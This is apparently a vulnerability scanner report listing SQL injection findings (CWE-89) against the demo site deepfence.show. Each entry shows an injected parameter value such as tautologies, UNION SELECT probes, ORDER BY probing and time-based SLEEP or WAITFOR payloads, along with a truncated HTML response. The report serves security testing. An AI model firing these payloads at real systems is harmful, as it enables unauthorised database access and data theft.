Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nSensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryAlerts hints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1468\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin') or '1'='1'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1469\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1470\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1471Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \" or sleep(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1472\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 8--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1473\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# &&SLEEP(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1474\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\") or \"1\"=\"1\"#ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1475\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 6#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1476Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1477\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \") or true--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1478\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 4\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1479\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# waitfor delay '00:00:05'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1480\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1481\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \\\\\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1482\nScan SQL Injection\nSeverity 